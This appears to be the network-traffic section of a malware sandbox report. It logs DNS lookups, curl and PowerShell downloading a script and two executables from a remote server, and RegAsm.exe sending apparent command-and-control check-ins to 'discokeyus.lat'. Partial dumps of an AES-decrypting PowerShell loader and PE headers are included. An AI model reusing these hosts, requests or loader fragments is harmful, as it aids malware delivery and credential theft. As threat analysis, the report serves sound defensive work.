Dec 20, 2024 07:18:19.438370943 CET	443	49745	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:19.438548088 CET	49745	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:19.438608885 CET	443	49745	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:19.442142010 CET	49745	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:19.442233086 CET	443	49745	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:19.442351103 CET	49745	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:19.442383051 CET	443	49745	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:19.442461967 CET	49745	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:19.442476034 CET	443	49745	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:19.442501068 CET	49745	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:19.442516088 CET	443	49745	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:19.442572117 CET	49745	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:19.442591906 CET	443	49745	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:19.442625999 CET	49745	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:19.442648888 CET	443	49745	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:19.442744017 CET	49745	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:19.442760944 CET	443	49745	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:19.442823887 CET	49745	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:19.442914963 CET	443	49745	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:19.442920923 CET	49745	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:19.442949057 CET	49745	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:19.443021059 CET	443	49745	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:19.445142031 CET	49745	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:19.445199966 CET	49745	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:19.445219040 CET	49745	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:19.466522932 CET	49745	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:19.466542006 CET	443	49745	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:23.186966896 CET	443	49745	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:23.187088013 CET	443	49745	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:23.187171936 CET	49745	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:23.187418938 CET	49745	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:23.187438965 CET	443	49745	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:23.192506075 CET	49750	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:23.192605019 CET	443	49750	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:23.192711115 CET	49750	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:23.193108082 CET	49750	443	192.168.2.4	172.67.197.170
Dec 20, 2024 07:18:23.193147898 CET	443	49750	172.67.197.170	192.168.2.4
Dec 20, 2024 07:18:23.912823915 CET	49750	443	192.168.2.4	172.67.197.170

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 20, 2024 07:18:03.910798073 CET	60815	53	192.168.2.4	1.1.1.1
Dec 20, 2024 07:18:04.135057926 CET	53	60815	1.1.1.1	192.168.2.4
Dec 20, 2024 07:18:04.143228054 CET	65307	53	192.168.2.4	1.1.1.1
Dec 20, 2024 07:18:04.620106936 CET	53	65307	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 20, 2024 07:18:03.910798073 CET	192.168.2.4	1.1.1.1	0xafc0	Standard query (0)	grannyejh.lat	A (IP address)	IN (0x0001)	false
Dec 20, 2024 07:18:04.143228054 CET	192.168.2.4	1.1.1.1	0xc47d	Standard query (0)	discokeyus.lat	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 20, 2024 07:18:04.135057926 CET	1.1.1.1	192.168.2.4	0xafc0	Name error (3)	grannyejh.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 20, 2024 07:18:04.620106936 CET	1.1.1.1	192.168.2.4	0xc47d	No error (0)	discokeyus.lat		172.67.197.170	A (IP address)	IN (0x0001)	false
Dec 20, 2024 07:18:04.620106936 CET	1.1.1.1	192.168.2.4	0xc47d	No error (0)	discokeyus.lat		104.21.21.99	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

discokeyus.lat

147.45.44.131

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	147.45.44.131	80	4008	C:\Windows\SysWOW64\curl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 07:17:58.501565933 CET	195	OUT	GET /infopage/bhgto.ps1 HTTP/1.1 Host: 147.45.44.131 User-Agent: curl/7.83.1 Accept: / X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
Dec 20, 2024 07:17:59.722228050 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 06:17:59 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Tue, 17 Dec 2024 21:00:53 GMT ETag: "5ca-6297d97b903a6" Accept-Ranges: bytes Content-Length: 1482 Data Raw: 0d 0a 24 48 77 20 3d 20 27 74 71 77 32 51 52 6d 5a 30 70 66 58 44 66 61 4e 4d 4e 31 36 67 52 32 61 43 49 68 76 37 41 6d 4d 58 7a 4f 48 6c 67 2b 53 77 63 51 3d 27 0d 0a 24 79 79 20 3d 20 27 32 33 45 74 41 58 4f 7a 39 50 44 2b 30 52 4a 36 57 62 6d 49 78 77 3d 3d 27 0d 0a 24 31 58 20 3d 20 27 69 7a 48 6f 69 6c 50 51 54 7a 6d 4a 52 57 4c 62 7a 2f 4f 73 6c 74 2f 66 39 52 51 42 64 59 6e 45 65 59 6d 32 68 50 35 67 63 58 58 2f 66 45 62 44 43 7a 66 63 33 66 69 55 68 6b 5a 48 6a 54 72 69 38 41 42 56 4c 47 39 4f 58 34 53 71 74 69 72 59 43 46 7a 7a 53 67 6f 73 66 6e 6b 78 64 6f 4d 48 33 74 52 6d 34 32 64 43 4f 45 42 45 4d 35 57 78 54 36 36 7a 38 75 72 6d 6e 6b 72 7a 49 73 32 63 73 4b 48 41 54 47 43 79 65 6f 65 53 38 31 34 72 38 47 71 35 34 63 46 30 5a 58 5a 4a 2b 48 47 63 46 51 4f 6d 4c 78 6c 37 71 61 78 33 41 76 64 6f 6d 57 71 53 47 2b 63 78 73 6e 32 67 4a 46 52 69 49 33 7a 76 4b 66 4c 5a 2f 54 45 6a 65 30 4f 48 33 68 49 61 2b 75 44 31 56 62 52 63 57 2b 31 6a 2f 6d 4e 62 4a 72 2b 45 55 51 77 6c 35 67 6a 51 6e [TRUNCATED] Data Ascii: $Hw = 'tqw2QRmZ0pfXDfaNMN16gR2aCIhv7AmMXzOHlg+SwcQ='$yy = '23EtAXOz9PD+0RJ6WbmIxw=='$1X = 'izHoilPQTzmJRWLbz/Oslt/f9RQBdYnEeYm2hP5gcXX/fEbDCzfc3fiUhkZHjTri8ABVLG9OX4SqtirYCFzzSgosfnkxdoMH3tRm42dCOEBEM5WxT66z8urmnkrzIs2csKHATGCyeoeS814r8Gq54cF0ZXZJ+HGcFQOmLxl7qax3AvdomWqSG+cxsn2gJFRiI3zvKfLZ/TEje0OH3hIa+uD1VbRcW+1j/mNbJr+EUQwl5gjQnLzUSoY/77z1fh9eW+YNABrrh2khkRY8do5aC9yyFy94uFNRyXzDZt+Bu3nNFJmgzz3t9Mag43tNfMXOe8RSQ56TkjA1hyIK+MGn3dEG6lkkLeMm4ptyGm/UAJf/yWLxaG1ABIwQVpQ5ol8zggdFz2DRSqZKZ2HrdTkBrbP3ZSkQD21AUvzNo4AEFFFg+5yunM6guI1c2K9TiAuJQNH34k+DkACAqt4Tqu+rD2vY8O9sBp6dEJf56p+03D63zwZ1GxMGyml23IsasVo2esx/t+ZoLR/ixMycjV0/Dtsj89AMX/DpRI28SbRgvHlSO/pzhKEOuXZVcvv3cT1upvxiaBQcv1jR5ExZjio7jc1rBWoGdbSunl9T0Ss6h5c='function sa ($k4, $Hw, $yy) { $8L = [Convert]::FromBase64String($Hw) $0q = [Convert]::FromBase64String($yy) $II = [Convert]::FromBase64String($k4) $so = [System.Security.Cryptography.Aes]::Create() $so.Key = $8L $so.IV = $0q $so.Padding = [System.Security [TRUNCATED]
Dec 20, 2024 07:17:59.722258091 CET	451	IN	Data Raw: 6e 67 4d 6f 64 65 5d 3a 3a 50 4b 43 53 37 0d 0a 20 20 20 20 24 31 4a 20 3d 20 24 73 6f 2e 43 72 65 61 74 65 44 65 63 72 79 70 74 6f 72 28 24 73 6f 2e 4b 65 79 2c 20 24 73 6f 2e 49 56 29 0d 0a 20 20 20 20 24 43 31 20 3d 20 4e 65 77 2d 4f 62 6a 65 Data Ascii: ngMode]::PKCS7 $1J = $so.CreateDecryptor($so.Key, $so.IV) $C1 = New-Object System.IO.MemoryStream(, $II) $Pb = New-Object System.Security.Cryptography.CryptoStream($C1, $1J, [System.Security.Cryptography.CryptoStreamMode]::Read)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49733	147.45.44.131	80	7100	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 07:18:00.499728918 CET	180	OUT	GET /infopage/knhy.exe HTTP/1.1 X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq Host: 147.45.44.131 Connection: Keep-Alive
Dec 20, 2024 07:18:01.761307955 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 06:18:01 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Tue, 17 Dec 2024 20:57:01 GMT ETag: "b200-6297d89e9c02c" Accept-Ranges: bytes Content-Length: 45568 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 19 bb 4b a7 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a4 00 00 00 0c 00 00 00 00 00 00 ee c3 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 9c c3 00 00 4f 00 00 00 00 e0 00 00 18 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 80 c3 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELK"0 @ `O H.text `.rsrc@@.reloc@BH"0S(rp(o(r3p(os%oo~o~((0(rp(o(~((osso(rp(oo&o(r-p(oo&o%oo(rWp(oo(rqp(oo%%o &
Dec 20, 2024 07:18:01.761365891 CET	1236	IN	Data Raw: 2a 1e 02 28 16 00 00 0a 2a 00 13 30 05 00 66 00 00 00 03 00 00 11 28 21 00 00 0a 03 6f 22 00 00 0a 0a 02 02 8e 69 17 59 91 1f 70 61 0b 02 8e 69 8d 20 00 00 01 0c 16 0d 16 13 04 2b 28 08 11 04 02 11 04 91 07 61 06 09 91 61 d2 9c 09 03 6f 23 00 00 Data Ascii: (0f(!o"iYpai +(aao#Y3+XXiY2iY(+((((*0L(rp(o(rp(o(rp(o
Dec 20, 2024 07:18:01.761403084 CET	248	IN	Data Raw: 00 00 00 00 92 00 3f 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 92 00 97 02 00 00 00 00 49 00 8e 00 00 00 00 4b 31 00 50 31 00 43 6f 6e 73 6f 6c 65 41 70 70 36 36 00 67 65 74 5f 55 54 46 38 00 3c 4d 6f 64 75 6c 65 3e 00 44 6f 77 6e 6c 6f Data Ascii: ?IK1P1ConsoleApp66get_UTF8<Module>DownloadDataEncryptDatamscorlibAddSystem.Collections.SpecializedGetMethodCompileAssemblyFromSourceget_BigEndianUnicodeInvokeGetTypeMethodBaseGuidAttributeD
Dec 20, 2024 07:18:01.761434078 CET	1236	IN	Data Raw: 61 62 6c 65 41 74 74 72 69 62 75 74 65 00 43 6f 6d 56 69 73 69 62 6c 65 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 54 69 74 6c 65 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 54 72 61 64 65 6d 61 72 6b 41 74 74 72 69 62 75 74 Data Ascii: ableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttributeCompilationRelaxationsAttributeAssemblyProdu
Dec 20, 2024 07:18:01.761468887 CET	1236	IN	Data Raw: 00 58 00 46 00 51 00 61 00 55 00 78 00 6f 00 53 00 6e 00 45 00 3d 00 00 c0 00 92 f9 52 00 6a 00 42 00 56 00 59 00 32 00 46 00 42 00 56 00 56 00 64 00 4e 00 56 00 54 00 68 00 53 00 52 00 6d 00 78 00 4e 00 57 00 56 00 42 00 58 00 4f 00 44 00 68 00 Data Ascii: XFQaUxoSnE=RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVEhJY1p3VllEVVVXQzFVR1BXODhGMFVMREZGVlZSdEZGbE1QVEdRQWFCWmZE
Dec 20, 2024 07:18:01.761504889 CET	448	IN	Data Raw: 61 00 46 00 6c 00 53 00 52 00 6d 00 78 00 6a 00 53 00 47 00 4e 00 70 00 64 00 46 00 6c 00 43 00 62 00 45 00 31 00 68 00 55 00 33 00 70 00 30 00 4c 00 30 00 70 00 72 00 53 00 56 00 64 00 52 00 61 00 7a 00 46 00 32 00 59 00 55 00 4a 00 61 00 56 00 Data Ascii: aFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllRblFMRm5VYWFCUlRFRUlIRUJnaGFTdFlGZ1ZRU2tBVWFoZFRUaFlSRmxjSG
Dec 20, 2024 07:18:01.761538029 CET	1236	IN	Data Raw: 55 00 6a 00 52 00 4d 00 52 00 45 00 56 00 4b 00 56 00 6d 00 4e 00 42 00 54 00 6d 00 46 00 47 00 4d 00 55 00 35 00 4d 00 59 00 6e 00 70 00 34 00 56 00 6b 00 70 00 72 00 53 00 56 00 64 00 48 00 56 00 48 00 52 00 76 00 55 00 57 00 68 00 61 00 56 00 Data Ascii: UjRMREVKVmNBTmFGMU5MYnp4VkprSVdHVHRvUWhaVkprSVdRaFlRQjBJQWRBd1dJRjhXSVZrYmNBZEVGbE1RVEhFUWNpQlBGbE1SU2tBVWFoZFRTdzF2YUJaVk
Dec 20, 2024 07:18:01.761574030 CET	1236	IN	Data Raw: 4d 00 79 00 5a 00 31 00 64 00 52 00 61 00 46 00 70 00 44 00 55 00 57 00 68 00 61 00 56 00 6b 00 70 00 72 00 53 00 56 00 64 00 52 00 61 00 46 00 70 00 42 00 54 00 6c 00 5a 00 72 00 51 00 30 00 31 00 47 00 57 00 6e 00 68 00 43 00 4d 00 45 00 6b 00 Data Ascii: MyZ1dRaFpDUWhaVkprSVdRaFpBTlZrQ01GWnhCMEkyQ2tRUVp3WjFEVmdXQjA0QkpFNDdhQlpDUWhaVkprSVdRaFpDUWhReVl4WmlDa1FIQTFJMmFReENCMDRX
Dec 20, 2024 07:18:01.761606932 CET	1236	IN	Data Raw: 55 00 32 00 34 00 34 00 59 00 6d 00 4e 00 71 00 53 00 6b 00 4e 00 46 00 51 00 6c 00 6c 00 4c 00 51 00 54 00 46 00 6e 00 55 00 6d 00 46 00 6e 00 59 00 32 00 5a 00 58 00 56 00 48 00 52 00 76 00 55 00 57 00 68 00 61 00 56 00 6b 00 70 00 6f 00 53 00 Data Ascii: U244YmNqSkNFQllLQTFnUmFnY2ZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFl4QjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NV
Dec 20, 2024 07:18:01.761643887 CET	1236	IN	Data Raw: 4a 00 52 00 62 00 46 00 56 00 4f 00 52 00 45 00 56 00 4a 00 55 00 57 00 5a 00 6f 00 57 00 57 00 5a 00 58 00 56 00 48 00 52 00 76 00 55 00 57 00 68 00 61 00 56 00 6b 00 70 00 6f 00 53 00 6b 00 56 00 44 00 4d 00 45 00 46 00 45 00 52 00 6d 00 78 00 Data Ascii: JRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbUFMRUVJQVp3NTNEbG9OQVhNTlFnZGFCMUVERmxOZFR3eENNa0lRUWw0
Dec 20, 2024 07:18:01.881292105 CET	1236	IN	Data Raw: 56 00 46 00 6c 00 42 00 5a 00 45 00 56 00 55 00 61 00 46 00 6c 00 4d 00 52 00 45 00 56 00 4b 00 56 00 6c 00 70 00 43 00 5a 00 46 00 46 00 43 00 52 00 6b 00 31 00 52 00 54 00 56 00 59 00 34 00 55 00 46 00 6b 00 77 00 4e 00 46 00 64 00 46 00 52 00 Data Ascii: VFlBZEVUaFlMREVKVlpCZFFCRk1RTVY4UFkwNFdFRk1FUWw4YmNrSlVHMElIRVdRUVp3WWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbU
Dec 20, 2024 07:18:02.204627037 CET	156	OUT	GET /infopage/bnkh.exe HTTP/1.1 X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq Host: 147.45.44.131
Dec 20, 2024 07:18:02.604983091 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 06:18:02 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Tue, 17 Dec 2024 20:55:22 GMT ETag: "49c00-6297d83faa710" Accept-Ranges: bytes Content-Length: 302080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ac 00 00 00 00 00 00 50 88 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bf 1b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 88 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 1d [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL<_gP@`@ 8.text6 `.rdata "@@.data0P@.reloc8 :b@B

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	172.67.197.170	443	7432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-20 06:18:05 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: discokeyus.lat
2024-12-20 06:18:05 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-20 06:18:06 UTC	1132	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 06:18:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=l1clqa1q65112ntrlnnr5qob2p; expires=Tue, 15 Apr 2025 00:04:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6%2FZgZUBunt%2FMcfiJZWlKJyaztzsoKSdA24yXiQ4%2BdnLe5YfRA12G86iPzqSGDySaleQf2LLH3qmatSajWqM%2BH0acwDOa7kZ63%2FlPfH3eLfAqzYz8W8Jv%2BBZWXGCVblGgFQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4d835c5d6e43e3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2559&min_rtt=2246&rtt_var=1066&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=905&delivery_rate=1300089&cwnd=229&unsent_bytes=0&cid=8e49f1373b498f01&ts=739&x=0"
2024-12-20 06:18:06 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-20 06:18:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	172.67.197.170	443	7432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-20 06:18:07 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 45 Host: discokeyus.lat
2024-12-20 06:18:07 UTC	45	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 44 55 6b 67 4c 76 2d 2d 74 61 78 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=DUkgLv--tax&j=
2024-12-20 06:18:08 UTC	1129	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 06:18:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mqqr9g46h6fcnp61kogpmbhqt5; expires=Tue, 15 Apr 2025 00:04:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z6KIta1OMo50twfQN0DMsTBo%2F0AICd3oIM21L1%2FpiYM%2F%2FrPOzaUJInGsaKmJWYwZ5SbA0zKn3bswSdkgOijf0RIJZsAZqi%2BtBEgiaHr551PvDfGFybPAqtTsrPBaUS5U6Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4d83689f790f8c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1484&min_rtt=1478&rtt_var=567&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=943&delivery_rate=1906005&cwnd=212&unsent_bytes=0&cid=659ae6c122ccd87e&ts=778&x=0"
2024-12-20 06:18:08 UTC	240	IN	Data Raw: 34 36 36 0d 0a 75 56 59 50 30 2f 43 71 64 6c 54 63 76 52 76 2f 45 73 4a 69 2f 7a 57 6b 54 2f 78 30 62 35 62 62 41 38 4b 6c 36 61 65 32 34 53 4c 43 64 48 6e 78 79 70 35 61 64 71 2f 59 4f 63 56 6d 73 42 65 61 47 59 59 75 6d 46 5a 56 38 4c 70 76 73 63 44 46 68 63 43 4d 41 49 4d 77 62 72 2b 44 7a 31 70 32 75 63 55 35 78 55 6d 35 51 4a 70 62 68 6e 58 65 45 51 58 30 75 6d 2b 67 78 49 4c 49 78 6f 31 42 30 54 70 6f 75 35 58 4a 45 6a 57 77 30 48 36 61 64 36 4d 49 6b 56 7a 4a 4a 35 46 57 51 37 53 2b 65 65 43 66 79 2b 72 54 6c 55 50 30 4e 33 79 34 30 74 64 61 4c 2f 37 59 64 64 30 6f 34 41 4f 61 56 38 67 70 6d 42 38 48 2f 72 4e 6e 6f 63 47 44 31 39 2b 48 53 74 45 30 61 37 71 66 77 41 59 34 75 74 64 31 6e 48 32 6a 51 4e 4d Data Ascii: 466uVYP0/CqdlTcvRv/EsJi/zWkT/x0b5bbA8Kl6ae24SLCdHnxyp5adq/YOcVmsBeaGYYumFZV8LpvscDFhcCMAIMwbr+Dz1p2ucU5xUm5QJpbhnXeEQX0um+gxILIxo1B0Tpou5XJEjWw0H6ad6MIkVzJJ5FWQ7S+eeCfy+rTlUP0N3y40tdaL/7Ydd0o4AOaV8gpmB8H/rNnocGD19+HStE0a7qfwAY4utd1nH2jQNM
2024-12-20 06:18:08 UTC	893	IN	Data Raw: 58 77 54 58 65 54 6b 32 6e 69 32 4b 78 31 70 37 49 78 49 55 41 78 48 70 30 38 5a 58 45 56 47 37 2b 31 33 57 54 64 61 4d 50 6d 6c 62 47 50 35 45 57 44 76 79 78 5a 61 72 49 68 4d 72 61 69 55 66 54 50 57 71 2b 6c 63 41 53 4f 62 32 66 4e 39 31 33 75 45 44 46 46 2b 59 39 6e 52 55 5a 2b 61 67 68 76 34 6d 53 68 64 4f 50 41 49 4e 30 61 37 2b 54 78 52 51 6b 74 74 52 79 6d 47 4b 72 43 5a 42 61 78 69 43 55 47 51 37 30 76 6d 75 71 79 49 48 42 32 59 35 47 32 7a 51 74 2f 39 4c 50 44 48 62 6d 6e 31 71 59 59 4b 63 4d 69 78 58 38 62 59 46 59 46 4c 53 2b 62 65 43 66 79 38 33 52 67 45 50 51 4f 32 36 35 6d 64 6f 55 4a 4c 6a 53 66 49 39 32 70 51 36 58 56 4e 51 6e 6b 42 41 4f 2f 62 4a 6f 70 63 43 50 68 5a 72 44 52 38 4e 30 4e 66 47 7a 78 52 38 36 74 4d 68 35 33 57 2f 75 47 64 Data Ascii: XwTXeTk2ni2Kx1p7IxIUAxHp08ZXEVG7+13WTdaMPmlbGP5EWDvyxZarIhMraiUfTPWq+lcASOb2fN913uEDFF+Y9nRUZ+aghv4mShdOPAIN0a7+TxRQkttRymGKrCZBaxiCUGQ70vmuqyIHB2Y5G2zQt/9LPDHbmn1qYYKcMixX8bYFYFLS+beCfy83RgEPQO265mdoUJLjSfI92pQ6XVNQnkBAO/bJopcCPhZrDR8N0NfGzxR86tMh53W/uGd
